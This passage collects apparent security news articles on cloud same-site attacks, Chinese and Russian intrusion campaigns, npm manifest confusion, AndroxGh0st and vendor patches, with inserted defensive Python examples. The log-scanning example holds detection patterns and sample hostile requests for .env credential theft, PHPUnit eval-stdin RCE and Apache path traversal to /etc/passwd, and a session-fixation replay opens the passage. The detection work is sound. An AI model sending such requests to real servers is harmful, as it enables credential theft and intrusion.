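    def login_hardened(self, presented_sid: str, user: str) -> str:
        """Invalidate the pre-login id and bind the login to a freshly issued one."""
        self._sessions.pop(presented_sid, None)
        fresh = secrets.token_urlsafe(32)
        self._sessions[fresh] = Session(user=user)
        return fresh


def fixation_succeeds(login_name: str) -> bool:
    """Replay the scenario: a valid anonymous id is known to a third party, the
    victim's browser presents that id at login. True if the known id ends up
    authenticated as the victim, i.e. the login method is fixation-prone."""
    store = SessionStore()
    known_sid = store.new_session()           # any valid id a third party could learn
    login = getattr(store, login_name)
    login(known_sid, "victim")                # victim authenticates with the fixated id
    return store.user_for(known_sid) == "victim"


if __name__ == "__main__":
    for name in ("login_vulnerable", "login_hardened"):
        print(f"{name}: fixated id authenticated = {fixation_succeeds(name)}")
```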
"FlowFixation highlights a broader issue with the current state of cloud providers' domain architecture and management as it relates to the Public Suffix List (PSL) and shared-parent domains: same-site attacks," Matan said, adding the misconfiguration also impacts Microsoft Azure and Google Cloud.
Tenable also pointed out that the shared architecture – where several customers have the same parent domain – could be a goldmine for attackers looking to exploit vulnerabilities like same-site attacks, cross-origin issues, and cookie tossing, effectively leading to unauthorized access, data leaks, and code execution.
The shortcoming has been addressed by both AWS and Azure adding the misconfigured domains to the PSL, thus causing web browsers to recognize the added domains as a public suffix. Google Cloud, on the other hand, has described the issue as not "severe enough" to merit a fix.
"In the case of same-site attacks, the security impact of the mentioned domain architecture is significant, with heightened risk of such attacks in cloud environments," Matan explained.
"Among these, cookie-tossing attacks and same-site attribute cookie protection bypass are particularly concerning as both can circumvent CSRF protection. Cookie-tossing attacks can also abuse session-fixation issues."
China-Linked Group Breaches Networks via Connectwise, F5 Software Flaws
22.3.24
APT
The Hacker News
A China-linked threat cluster leveraged security flaws in Connectwise ScreenConnect and F5 BIG-IP software to deliver custom malware capable of delivering additional backdoors on compromised Linux hosts as part of an "aggressive" campaign.
Google-owned Mandiant is tracking the activity under its uncategorized moniker UNC5174 (aka Uteus or Uetus), describing it as a "former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations."
The threat actor is believed to have orchestrated widespread attacks against Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and U.K. government organizations between October and November 2023, and again in February 2024 using the ScreenConnect bug.
Initial access to target environments is facilitated by the exploitation of known security flaws in Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709), F5 BIG-IP (CVE-2023-46747), Linux Kernel (CVE-2022-0185), and Zyxel (CVE-2022-3052).
A successful foothold is followed by extensive reconnaissance and scanning of internet-facing systems for security vulnerabilities, with UNC5174 also creating administrative user accounts to execute malicious actions with elevated privileges, including dropping a C-based ELF downloader dubbed SNOWLIGHT.
SNOWLIGHT is designed to download the next-stage payload, an obfuscated Golang backdoor named GOREVERSE, from a remote URL that's related to SUPERSHELL, an open-source command-and-control (C2) framework that allows attackers to establish a reverse SSH tunnel and launch interactive shell sessions to execute arbitrary code.
Also put to use by the threat actor is a Golang-based tunneling tool known as GOHEAVY, which is likely employed to facilitate lateral movement within compromised networks, as well as other programs like afrog, DirBuster, Metasploit, Sliver, and sqlmap.
In one unusual instance spotted by the threat intelligence firm, the threat actors have been found to apply mitigations for CVE-2023-46747 in a likely attempt to prevent other unrelated adversaries from weaponizing the same loophole to obtain access.
"UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives 'Dawn Calvary' and has collaborated with 'Genesis Day' / 'Xiaoqiying' and 'Teng Snake,'" Mandiant assessed. "This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments."
There is evidence to suggest that the threat actor may be an initial access broker and has the backing of the MSS, given their alleged claims in dark web forums. This is bolstered by the fact some of the U.S. defense and U.K. government entities were simultaneously targeted by another access broker referred to as UNC302.
The findings once again underscore Chinese nation-state groups' continued efforts to breach edge appliances by swiftly co-opting recently disclosed vulnerabilities into their arsenal in order to conduct cyber espionage operations at scale.
"UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, U.K. government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation," Mandiant researchers said.
"There are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution."
The disclosure comes as the MSS warned that an unnamed foreign hacking group had infiltrated "hundreds" of Chinese business and government organizations by leveraging phishing emails and known security bugs to breach networks. It did not reveal the threat actor's name or origin.
Massive Sign1 Campaign Infects 39,000+ WordPress Sites with Scam Redirects
22.3.24
Spam
The Hacker News
A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites.
The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.
The attacks entail injecting rogue JavaScript into legitimate HTML widgets and plugins that allow for arbitrary JavaScript and other code to be inserted, providing attackers with an opportunity to add their malicious code.
The XOR-encoded JavaScript code is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately facilitates redirects to a VexTrio-operated traffic distribution system (TDS) but only if certain criteria are met.
What's more, the malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes to get around blocklists. These domains are registered a few days prior to their use in attacks.
"One of the most noteworthy things about this code is that it is specifically looking to see if the visitor has come from any major websites such as Google, Facebook, Yahoo, Instagram etc.," security researcher Ben Martin said. "If the referrer does not match to these major sites, then the malware will not execute."
Site visitors are then taken to other scam sites by executing another JavaScript from the same server.
The Sign1 campaign, first detected in the second half of 2023, has witnessed several iterations, with the attackers leveraging as many as 15 different domains since July 31, 2023.
It's suspected that WordPress sites have been taken over by means of a brute-force attack, although adversaries could also leverage security flaws in plugins and themes to obtain access.
"Many of the injections are found inside WordPress custom HTML widgets that the attackers add to compromised websites," Martin said. "Quite often, the attackers install a legitimate Simple Custom CSS and JS plugin and inject the malicious code using this plugin."
This approach of not placing any malicious code into server files allows the malware to stay undetected for extended periods of time, Sucuri said.
U.S. Justice Department Sues Apple Over Monopoly and Messaging Security
22.3.24
BigBrothers
The Hacker News
The U.S. Department of Justice (DoJ), along with 16 other state and district attorneys general, on Thursday accused Apple of illegally maintaining a monopoly over smartphones, thereby undermining, among other things, the security and privacy of users when messaging non-iPhone users.
"Apple wraps itself in a cloak of privacy, security, and consumer preferences to justify its anticompetitive conduct," the landmark antitrust lawsuit said. "Apple deploys privacy and security justifications as an elastic shield that can stretch or contract to serve Apple's financial and business interests."
"Apple selectively compromises privacy and security interests when doing so is in Apple's own financial interest – such as degrading the security of text messages, offering governments and certain companies the chance to access more private and secure versions of app stores, or accepting billions of dollars each year for choosing Google as its default search engine when more private options are available."
The sprawling complaint also alleged that iPhone users who message a non-iPhone user via the Messages app are defaulted to the less secure SMS format (as opposed to iMessage) that lacks support for encryption and offers limited functionality. On the other hand, iMessage is end-to-end encrypted (E2EE) and is even quantum-resistant.
It's worth noting at this stage that iMessage is only available on the iPhone and other Apple devices. Apple has repeatedly said it has no plans of making iMessage interoperable with Android, even stating that doing so "will hurt us more than help us."
Furthermore, the 88-page lawsuit called out the iPhone maker for blocking attempts by third parties to bring a secure cross-platform messaging experience between the iOS and Android platforms.
In December 2023, Beeper managed to reverse engineer the iMessage protocol and port the service to Android through a dedicated client called Beeper Mini. Apple, however, has shut down those efforts, arguing that Beeper "posed significant risks to user security and privacy, including the potential for metadata exposure and enabling unwanted messages, spam, and phishing attacks."
These limitations have a powerful network effect, driving consumers to continue buying iPhones and making them less likely to switch to a competing device, the DoJ said, adding, "by rejecting solutions that would allow for cross-platform encryption, Apple continues to make iPhone users less secure than they could otherwise be."
The development comes as Apple is facing more scrutiny than ever to open up its tightly-controlled software ecosystem -- the so-called "walled garden" -- which regulators say locks in customers and developers. Other major tech giants like Microsoft, Google, Amazon, and Meta have all dealt with similar lawsuits in recent years.
Apple, in a surprise move late last year, announced that it intends to add support for Rich Communication Services (RCS) – an upgraded version of the SMS standard with modern instant messaging features – to its Messages app. It also said it will work with the GSMA members to integrate encryption.
In response to the lawsuit, Cupertino said it will "vigorously defend" itself and that the lawsuit "threatens who we are and the principles that set Apple products apart in fiercely competitive markets." It also said that DoJ winning the lawsuit would "set a dangerous precedent, empowering the government to take a heavy hand in designing people's technology."
Russian Hackers May Have Targeted Ukrainian Telecoms with Upgraded 'AcidPour' Malware
22.3.24
Virus
The Hacker News
The data wiping malware called AcidPour may have been deployed in attacks targeting four telecom providers in Ukraine, new findings from SentinelOne show.
The cybersecurity firm also confirmed connections between the malware and AcidRain, tying it to threat activity clusters associated with Russian military intelligence.
"AcidPour's expanded capabilities would enable it to better disable embedded devices including networking, IoT, large storage (RAIDs), and possibly ICS devices running Linux x86 distributions," security researchers Juan Andres Guerrero-Saade and Tom Hegel said.
AcidPour is a variant of AcidRain, a wiper that was used to render Viasat KA-SAT modems inoperable at the onset of the Russo-Ukrainian war in early 2022 and cripple Ukraine's military communications.
It also builds upon the latter's features, while targeting Linux systems running on x86 architecture. AcidRain, on the other hand, is compiled for MIPS architecture.
Where AcidRain was more generic, AcidPour incorporates logic to target embedded devices, Storage Area Networks (SANs), Network Attached Storage (NAS) appliances, and dedicated RAID arrays.
That said, both strains overlap when it comes to the use of reboot calls and the method employed for recursive directory wiping. Also identical is the IOCTL-based device-wiping mechanism, which in turn shares commonalities with another Sandworm-linked malware known as VPNFilter.
"One of the most interesting aspects of AcidPour is its coding style, reminiscent of the pragmatic CaddyWiper broadly utilized against Ukrainian targets alongside notable malware like Industroyer 2," the researchers said.
The C-based malware comes with a self-delete function that overwrites itself on disk at the beginning of its execution, while also employing an alternate wiping approach depending on the device type.
AcidPour has been attributed to a hacking crew tracked as UAC-0165, which is associated with Sandworm and has a track record of striking Ukrainian critical infrastructure.
The Computer Emergency Response Team of Ukraine (CERT-UA), in October 2023, implicated the adversary in attacks targeting at least 11 telecommunication service providers in the country between May and September of last year.
"[AcidPour] could have been used in 2023," Hegel told The Hacker News. "It's likely the actor has made use of AcidRain/AcidPour related tooling consistently throughout the war. A gap in this perspective speaks to the level of insight the public often has to cyber intrusions – generally quite limited and incomplete."
The ties to Sandworm are further bolstered by the fact that a threat actor known as Solntsepyok (aka Solntsepek or SolntsepekZ) claimed to have infiltrated four different telecommunication operators in Ukraine and disrupted their services on March 13, 2024, three days prior to the discovery of AcidPour.
Solntsepyok, according to the State Special Communications Service of Ukraine (SSSCIP), is a Russian advanced persistent threat (APT) with likely ties to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), which also operates Sandworm.
It's worth pointing out that Solntsepyok has also been accused of hacking into Kyivstar's systems as early as May 2023. The breach came to light in late December.
While it's currently not clear if AcidPour was used in the latest set of attacks, the discovery suggests that threat actors are constantly refining their tactics to stage destructive assaults and inflict significant operational impact.
"This progression reveals not only a refinement in the technical capabilities of these threat actors but also their calculated approach to select targets that maximize follow-on effects, disrupting critical infrastructure and communications," the researchers said.
Russian Hackers Using TinyTurla-NG to Breach European NGO's Systems
22.3.24
APT
The Hacker News
The Russia-linked threat actor known as Turla infected several systems belonging to an unnamed European non-governmental organization (NGO) in order to deploy a backdoor called TinyTurla-NG (TTNG).
"The attackers compromised the first system, established persistence and added exclusions to antivirus products running on these endpoints as part of their preliminary post-compromise actions," Cisco Talos said in a new report published today.
"Turla then opened additional channels of communication via Chisel for data exfiltration and to pivot to additional accessible systems in the network."
There is evidence indicating that the infected systems were breached as early as October 2023, with Chisel deployed in December 2023 and data exfiltration taking place via the tool a month later, around January 12, 2024.
TinyTurla-NG was first documented by the cybersecurity company last month after it was found to be used in connection with a cyber attack targeting a Polish NGO working on improving Polish democracy and supporting Ukraine during the Russian invasion.
Cisco Talos told The Hacker News at the time that the campaign appears to be highly targeted and focused on a small number of organizations, most of which are located in Poland.
The attack chain involves Turla exploiting their initial access to configure Microsoft Defender antivirus exclusions to evade detection and drop TinyTurla-NG, which is then persisted by creating a malicious "sdm" service that masquerades as a "System Device Manager" service.
TinyTurla-NG acts as a backdoor to conduct follow-on reconnaissance, exfiltrate files of interest to a command-and-control (C2) server, and deploy a custom-built version of the Chisel tunneling software. The exact intrusion pathway is still being investigated.
"Once the attackers have gained access to a new box, they will repeat their activities to create Microsoft Defender exclusions, drop the malware components, and create persistence," Talos researchers said.
Over 800 npm Packages Found with Discrepancies, 18 Exploitable to 'Manifest Confusion'
21.3.24
Virus
The Hacker News
New research has discovered over 800 packages in the npm registry which have discrepancies from their registry entries, out of which 18 have been found to exploit a technique called manifest confusion.
The findings come from cybersecurity firm JFrog, which said the issue could be exploited by threat actors to trick developers into running malicious code.
"It's an actual threat since developers may be tricked into downloading packages that look innocent, but whose hidden dependencies are actually malicious," security researcher Andrey Polkovnichenko told The Hacker News.
Manifest confusion was first documented in July 2023, when security researcher Darcy Clarke found that mismatches in manifest and package metadata could be weaponized to stage software supply chain attacks.
The problem stems from the fact that the npm registry does not validate whether the manifest file contained in the tarball (package.json) matches the manifest data provided to the npm server during the publishing process via an HTTP PUT request to the package URI endpoint.
As a result, a threat actor could take advantage of this lack of cross verification to supply a different manifest containing hidden dependencies that's processed during package installation to stealthily install malicious dependencies onto the developer's system.
"The visible, or 'fake,' manifest can mislead developers and even audit tools that rely on the data available in the npm registry database," JFrog said. "In reality, the installer takes the file package.json from the tarball, which may be different from the visible one supplied in the HTTP PUT request."
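The check JFrog describes is mechanical: fetch the manifest the registry displays for a version (registry.npmjs.org/&lt;name&gt;/&lt;version&gt;), fetch the tarball from its "dist.tarball" URL, and diff the two. The example below is an added illustration, not JFrog's or npm's code; both the registry document and the tarball are constructed inline so it runs offline. It reports dependencies that exist only in the tarball (the hidden ones an installer will pull in), dependencies that exist only in the registry view, version-range mismatches, and lifecycle scripts (preinstall, install, postinstall, prepare) that differ, since those run on the developer's machine at install time.

```python
import io
import json
import tarfile

# Added example (not JFrog's or npm's code): compare the manifest a registry
# shows for a version with the package.json actually shipped in the tarball.
# Real inputs: https://registry.npmjs.org/<name>/<version> and the tarball at
# its "dist.tarball" URL; both are constructed inline here so the check runs offline.

DEP_FIELDS = ("dependencies", "optionalDependencies", "peerDependencies")
INSTALL_SCRIPTS = {"preinstall", "install", "postinstall", "prepare"}


def build_tarball(files):
    """Build a gzip-compressed tar with the given {path: text} entries (test fixture only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in files.items():
            data = text.encode("utf-8")
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_tarball_manifest(tgz_bytes):
    """Return the package.json the installer will actually use (npm tarballs root at package/)."""
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        with tar.extractfile(tar.getmember("package/package.json")) as fh:
            return json.load(fh)


def compare_manifests(registry_manifest, tarball_manifest):
    """List every way the tarball manifest diverges from what the registry displays."""
    findings = []
    for field in DEP_FIELDS:
        visible = registry_manifest.get(field) or {}
        real = tarball_manifest.get(field) or {}
        for name, spec in real.items():
            if name not in visible:
                findings.append({"type": "hidden-dependency", "field": field,
                                 "name": name, "real": spec})
            elif visible[name] != spec:
                findings.append({"type": "range-mismatch", "field": field, "name": name,
                                 "visible": visible[name], "real": spec})
        for name in visible:
            if name not in real:
                findings.append({"type": "phantom-dependency", "field": field, "name": name})
    visible_scripts = registry_manifest.get("scripts") or {}
    real_scripts = tarball_manifest.get("scripts") or {}
    for name in sorted(set(visible_scripts) | set(real_scripts)):
        if visible_scripts.get(name) != real_scripts.get(name):
            findings.append({"type": "script-mismatch", "name": name,
                             "visible": visible_scripts.get(name),
                             "real": real_scripts.get(name),
                             "runs_on_install": name in INSTALL_SCRIPTS})
    return findings


# Constructed sample: the registry entry looks dependency-free, the tarball is not.
REGISTRY_MANIFEST = {"name": "example-pkg", "version": "1.0.0", "dependencies": {}}
TARBALL = build_tarball({
    "package/package.json": json.dumps({
        "name": "example-pkg", "version": "1.0.0",
        "dependencies": {"hidden-helper": "^1.0.0"},
        "scripts": {"postinstall": "node hidden.js"},
    }),
    "package/index.js": "module.exports = {};\n",
})


def audit_sample():
    """Run the comparison over the constructed registry view and tarball."""
    return compare_manifests(REGISTRY_MANIFEST, read_tarball_manifest(TARBALL))


if __name__ == "__main__":
    for finding in audit_sample():
        print(finding)
```

Wired into a dependency-intake pipeline, the tarball side is the only one that matters for what gets installed; the registry side is what reviewers and audit tooling see, which is exactly the gap manifest confusion exploits.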
The company said it identified more than 800 packages where there was a mismatch between the manifest in the npm registry and the package.json file inside the tarball.
While many of these mismatches are the result of protocol specification differences or variations in the scripts section of the package file, 18 of them are said to have been designed to exploit manifest confusion.
A notable package in question is yatai-web-ui, which is designed to send an HTTP request to a server with information about the IP address of the machine in which the package was installed.
The findings suggest that the attack vector appears never to have been used in real-world attacks by threat actors. That said, it's crucial that developers take steps to ensure the packages they consume are free of suspicious behaviors.
"Since this issue was not resolved by npm, trusting packages only by how they look on npm's website might be risky," Polkovnichenko said.
"Organizations should introduce procedures that verify that all packages that enter the organization or are used by their dev teams are safe and can be trusted. Specifically in the case of manifest confusion, it's required that every package is analyzed to see if there are any hidden dependencies."
AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials
21.3.24
Virus
The Hacker News
Cybersecurity researchers have shed light on a tool referred to as AndroxGh0st that's used to target Laravel applications and steal sensitive data.
"It works by scanning and taking out important information from .env files, revealing login details linked to AWS and Twilio," Juniper Threat Labs researcher Kashinath T Pattan said.
"Classified as an SMTP cracker, it exploits SMTP using various strategies such as credential exploitation, web shell deployment, and vulnerability scanning."
AndroxGh0st has been detected in the wild since at least 2022, with threat actors leveraging it to access Laravel environment files and steal credentials for various cloud-based applications like Amazon Web Services (AWS), SendGrid, and Twilio.
Attack chains involving the Python malware are known to exploit known security flaws in Apache HTTP Server, Laravel Framework, and PHPUnit to gain initial access and for privilege escalation and persistence.
Earlier this January, U.S. cybersecurity and intelligence agencies warned of attackers deploying the AndroxGh0st malware to create a botnet for "victim identification and exploitation in target networks."
"Androxgh0st first gains entry through a weakness in Apache, identified as CVE-2021-41773, allowing it to access vulnerable systems," Pattan explained.
"Following this, it exploits additional vulnerabilities, specifically CVE-2017-9841 and CVE-2018-15133, to execute code and establish persistent control, essentially taking over the targeted systems."
Androxgh0st is designed to exfiltrate sensitive data from various sources, including .env files, databases, and cloud credentials. This allows threat actors to deliver additional payloads to compromised systems.
Juniper Threat Labs said it has observed an uptick in activity related to the exploitation of CVE-2017-9841, making it essential that users move quickly to update their instances to the latest version.
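The initial-access steps described above leave distinctive traces in web server access logs: requests for .env files, hits on the PHPUnit eval-stdin.php endpoint tied to CVE-2017-9841, and the encoded-dot path traversal that characterizes CVE-2021-41773. The following is an added example, not Juniper's or the malware's code: it parses combined-format log lines and flags those patterns, then groups the hits per source IP so a scanner cycling through all three stands out. The log lines are constructed for the demonstration; the Laravel deserialization bug (CVE-2018-15133) is exploited via a request header, so it is not visible in this kind of log and is not covered here.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Added example (not Juniper's or the malware's code): flag access-log requests
# matching the initial-access techniques described in the article. Paths are the
# publicly known ones for each CVE; the sample log lines below are constructed.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ENV_RE = re.compile(r"(?:^|/)\.env(?:\.[a-z0-9_.-]+)?$")
PHPUNIT_RE = re.compile(r"/phpunit/.*/eval-stdin\.php$")


def classify(path):
    """Map a raw request path to an indicator name, or None if benign."""
    decoded = unquote(path).split("?", 1)[0].lower()   # decode once, drop the query string
    if ENV_RE.search(decoded):
        return "env-file-harvest"                       # Laravel .env holding AWS/Twilio/SendGrid keys
    if PHPUNIT_RE.search(decoded):
        return "cve-2017-9841-eval-stdin"               # PHPUnit remote code execution endpoint
    if "/cgi-bin/" in decoded and "/../" in decoded:
        return "cve-2021-41773-traversal"               # Apache 2.4.49 traversal via %2e-encoded dots
    return None


def scan_access_log(lines):
    """Return one finding per log line whose request path matches an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicator = classify(m["path"])
        if indicator:
            findings.append({"ip": m["ip"], "indicator": indicator,
                             "path": m["path"], "status": int(m["status"])})
    return findings


def summarize(findings):
    """Count indicators per source IP; one IP hitting several distinct ones is the scanner."""
    return {ip: Counter(f["indicator"] for f in findings if f["ip"] == ip)
            for ip in {f["ip"] for f in findings}}


# Constructed sample log (combined format); IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Mar/2024:10:01:02 +0000] "GET /.env HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    '198.51.100.7 - - [21/Mar/2024:10:01:03 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "python-requests/2.31"',
    '203.0.113.9 - - [21/Mar/2024:10:02:10 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1344 "-" "curl/8.0"',
    '192.0.2.5 - - [21/Mar/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Mar/2024:10:04:11 +0000] "GET /app/.env HTTP/1.1" 403 199 "-" "python-requests/2.31"',
]


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(summarize(hits))
```

A 200 response on an .env or traversal request is the line to escalate on: it means the file was served, and every credential in it should be treated as compromised and rotated.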
A majority of the attack attempts targeting its honeypot infrastructure originated from the U.S., U.K., China, the Netherlands, Germany, Bulgaria, Kuwait, Russia, Estonia, and India, it added.
The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that vulnerable WebLogic servers located in South Korea are being targeted by adversaries and used as download servers to distribute a cryptocurrency miner called z0Miner and other tools like fast reverse proxy (FRP).
It also follows the discovery of a malicious campaign that infiltrates AWS instances to create over 6,000 EC2 instances within minutes and deploy a binary associated with a decentralized content delivery network (CDN) known as Meson Network.
The Singapore-based company, which aims to create the "world's largest bandwidth marketplace," works by allowing users to exchange their idle bandwidth and storage resources with Meson for tokens (i.e., rewards).
"This means miners will receive Meson tokens as a reward for providing servers to the Meson Network platform, and the reward will be calculated based on the amount of bandwidth and storage brought into the network," Sysdig said in a technical report published this month.
"It isn't all about mining cryptocurrency anymore. Services like Meson network want to leverage hard drive space and network bandwidth instead of CPU. While Meson may be a legitimate service, this shows that attackers are always on the lookout for new ways to make money."
With cloud environments increasingly becoming a lucrative target for threat actors, it is critical to keep software up to date and monitor for suspicious activity.
Threat intelligence firm Permiso has also released a tool called CloudGrappler, which builds on cloudgrep and scans AWS and Azure environments to flag malicious events associated with well-known threat actors.
GitHub Launches AI-Powered Autofix Tool to Assist Devs in Patching Security Flaws
21.3.24
AI
The Hacker News
GitHub on Wednesday announced that it's making available a feature called code scanning autofix in public beta for all Advanced Security customers to provide targeted recommendations in an effort to avoid introducing new security issues.
"Powered by GitHub Copilot and CodeQL, code scanning autofix covers more than 90% of alert types in JavaScript, Typescript, Java, and Python, and delivers code suggestions shown to remediate more than two-thirds of found vulnerabilities with little or no editing," GitHub's Pierre Tempel and Eric Tooley said.
The capability, first previewed in November 2023, leverages a combination of CodeQL, Copilot APIs, and OpenAI GPT-4 to generate code suggestions. The Microsoft-owned subsidiary also said it plans to add support for more programming languages, including C# and Go, in the future.
Code scanning autofix is designed to help developers resolve vulnerabilities as they code by generating potential fixes as well as providing a natural language explanation when an issue is discovered in a supported language.
These suggestions could go beyond the current file to include changes to several other files and the dependencies that should be added to rectify the problem.
"Code scanning autofix lowers the barrier of entry to developers by combining information on best practices with details of the codebase and alert to suggest a potential fix to the developer," the company said.
"Instead of starting with a search for information about the vulnerability, the developer starts with a code suggestion that demonstrates a potential solution for their codebase."
That said, it's left to the developer to evaluate each recommendation, determine whether it's the right fix, and ensure that it does not deviate from the program's intended behavior.
GitHub also emphasized the current limitations of the autofix code suggestions, making it imperative that developers carefully review the changes and the dependencies before accepting them. Autofix may -
Suggest fixes that are not syntactically correct code changes
Suggest fixes that are syntactically correct code but are suggested at the incorrect location
Suggest fixes that are syntactically valid but that change the semantics of the program
Suggest fixes that fail to address the root cause, or introduce new vulnerabilities
Suggest fixes that only partially resolve the underlying flaw
Suggest unsupported or insecure dependencies
Suggest arbitrary dependencies, leading to possible supply chain attacks
"The system has incomplete knowledge of the dependencies published in the wider ecosystem," the company noted. "This can lead to suggestions that add a new dependency on malicious software that attackers have published under a statistically probable dependency name."
U.S. Sanctions Russians Behind 'Doppelganger' Cyber Influence Campaign
21.3.24
BigBrothers
The Hacker News
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sanctions against two 46-year-old Russian nationals and the respective companies they own for engaging in cyber influence operations.
Ilya Andreevich Gambashidze (Gambashidze), the founder of the Moscow-based company Social Design Agency (SDA), and Nikolai Aleksandrovich Tupikin (Tupikin), the CEO and current owner of Russia-based Company Group Structura LLC (Structura), have been accused of providing services to the Russian government in connection to a "foreign malign influence campaign."
The disinformation campaign is tracked by the broader cybersecurity community under the name Doppelganger, which is known to target audiences in Europe and the U.S. using inauthentic news sites and social media accounts.
"SDA and Structura have been identified as key actors of the campaign, responsible for providing [the Government of the Russian Federation] with a variety of services, including the creation of websites designed to impersonate government organizations and legitimate media outlets in Europe," the Treasury said.
Both Gambashidze and Tupikin have been accused of orchestrating a campaign in the Fall of 2022 that created a network of over 60 sites designed to masquerade as legitimate news websites and fake social media accounts to disseminate the content originating from those spoofed sites.
The department said the fake websites were built with an intent to mimic the appearance of their actual counterparts, with the portals including embedded images and working links to the legitimate sites and even impersonated the cookie consent pages as part of efforts to trick visitors.
Furthermore, a closer examination of the two cryptocurrency wallets listed by OFAC as associated with Gambashidze reveals that they have received more than $200,000 worth of USDT on the TRON network, with a significant chunk originating from the now-sanctioned exchange Garantex, Chainalysis said.
"He then cashed out most of his funds to a single deposit address at a mainstream exchange," the blockchain analytics firm noted. "These transactions highlight Garantex's continued involvement in the Russian government's illicit activities."
Doppelganger, active since at least February 2022, has been described by Meta as the "largest and the most aggressively-persistent Russian-origin operation."
In December 2023, Recorded Future revealed attempts by the malign network to leverage generative artificial intelligence (AI) to create inauthentic news articles and produce scalable influence content.
SDA and Structura, along with Gambashidze, have also been the subject of sanctions imposed by the Council of the European Union as of July 2023 for conducting a digital information manipulation campaign called Recent Reliable News (RRN) aimed at amplifying propaganda declaring support for Russia's war against Ukraine.
"This campaign [...] relies on fake web pages usurping the identity of national media outlets and government websites, as well as fake accounts on social media," the Council said at the time. "This coordinated and targeted information manipulation is part of a broader hybrid campaign by Russia against the E.U. and the member states."
The development comes as the U.S. House of Representatives unanimously passed a bill (Protecting Americans' Data from Foreign Adversaries Act, or H.R.7520) that would bar data brokers from selling Americans' sensitive data to foreign adversaries, namely China, Russia, North Korea, and Iran.
It also arrives a week after Congress passed another bill (Protecting Americans from Foreign Adversary Controlled Applications Act, or H.R.7521) that seeks to force Chinese company ByteDance to divest popular video sharing platform TikTok within six months, or risk facing a ban, due to national security concerns.
Ivanti Releases Urgent Fix for Critical Sentry RCE Vulnerability
21.3.24
Vulnerebility
The Hacker News
Ivanti has disclosed details of a critical remote code execution flaw impacting Standalone Sentry, urging customers to apply the fixes immediately to stay protected against potential cyber threats.
Tracked as CVE-2023-41724, the vulnerability carries a CVSS score of 9.6.
"An unauthenticated threat actor can execute arbitrary commands on the underlying operating system of the appliance within the same physical or logical network," the company said.
The flaw impacts all supported versions 9.17.0, 9.18.0, and 9.19.0, as well as older versions. The company said it has made available a patch (versions 9.17.1, 9.18.1, and 9.19.1) that can be downloaded via the standard download portal.
It credited Vincent Hutsebaut, Pierre Vivegnis, Jerome Nokin, Roberto Suggi Liverani and Antonin B. of NATO Cyber Security Centre for "their collaboration on this issue."
Ivanti emphasized that it's not aware of any customers affected by CVE-2023-41724, and added that "threat actors without a valid TLS client certificate enrolled through EPMM cannot directly exploit this issue on the internet."
Recently disclosed security flaws in Ivanti software have been subject to exploitation by at least three different suspected China-linked cyber espionage clusters tracked as UNC5221, UNC5325, and UNC3886, according to Mandiant.
The development comes as SonarSource revealed a mutation cross-site scripting (mXSS) flaw impacting an open-source email client called Mailspring aka Nylas Mail (CVE-2023-47479) that could be exploited to bypass sandbox and Content Security Policy (CSP) protections and achieve code execution when a user replies to or forwards a malicious email.
"mXSS takes advantage of that by providing a payload that seems innocent initially when parsing (during the sanitization process) but mutates it to a malicious one when re-parsing it (in the final stage of displaying the content)," security researcher Yaniv Nizry said.
Atlassian Releases Fixes for Over 2 Dozen Flaws, Including Critical Bamboo Bug
21.3.24
Vulnerebility
The Hacker News
Atlassian has released patches for more than two dozen security flaws, including a critical bug impacting Bamboo Data Center and Server that could be exploited without requiring user interaction.
Tracked as CVE-2024-1597, the vulnerability carries a CVSS score of 10.0, indicating maximum severity.
Described as an SQL injection flaw, it's rooted in a dependency called org.postgresql:postgresql, as a result of which the company said it "presents a lower assessed risk" despite the criticality.
"This org.postgresql:postgresql dependency vulnerability [...] could allow an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction," Atlassian said.
According to a description of the flaw in the NIST's National Vulnerability Database (NVD), "pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE." The driver versions prior to the ones listed below are impacted -
42.7.2
42.6.1
42.5.5
42.4.4
42.3.9, and
42.2.28 (also fixed in 42.2.28.jre7)
